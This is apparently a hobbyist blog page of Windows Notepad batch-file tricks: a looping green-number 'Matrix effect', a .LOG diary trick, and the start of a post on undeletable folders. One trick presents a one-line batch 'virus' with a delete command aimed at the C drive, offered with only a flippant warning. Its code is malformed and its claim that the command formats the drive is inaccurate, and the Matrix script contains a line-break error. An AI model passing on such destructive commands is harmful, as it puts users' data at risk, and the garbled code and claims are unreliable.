Pages

Saturday, January 25

TOP 3 NOTEPAD TRICKS

 1. Matrix Effect Trick

matrix effect trick
In this trick i will show you to make a batch file in notepad which will act as matrix effect that you might have seen in movies.Matrix effect is basically number flashes in green color.

    1. Open Notepad and copy below code into it.

@echo off
color 02
:start
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
 %random% %random%goto start

    2. Now save this file as Matrix.bat (name can be anything but .bat is must)
    3. Open your saved file and you will have matrix effect on your screen.

NOTE : You can change color 02 to any other number(for instance 03 for blue)

2. Creating Virus That Format C Drive

computer virus
In this trick we will be creating virus in notepad using batch file programming. This virus is really simple to create yet very dangerous. opening this file we delete or format C drive of your computer.

    1. Open Notepad and copy below code into it.

@Echo off
Del C:\ *.* |y
  
    2. Then Save this file as virus.bat
    3. Now, running this file format C Drive.

NOTE: PLEASE DON'T TRY IT ON YOUR OWN LAPTOP.USE IT ON YOUR RISK.

3. Making Personal Diary Using Notepad 

notepad tricks
Here you will learn to use notepad as Diary or a log book to keep record of your daily work instead of using pen and paper.

    1. Open Notepad and Type .LOG (in capital Letters and press enter
    2. Save the program with any name and close it.
    3. Open the file again. Now you can see current date and time, This will happen every time when you reopen notepad.

ENJOY!!

Creating undeletable folder in Windows

Aah!!after long time I am goin' to write a post on some interesting trick....Well it's being 5:00 a.m and suddenly I think to write something in my blog. First of all,I apologize for not writing the article from long time. So without wasting your time,I come to the main point.
                                          Well today I want to share on windows trick i.e. to create undeletable, unrenamable folderMost of the Peoples are not aware that it is possible to create Undeletable, Unrenamable folder in windows without any software.

Popular Posts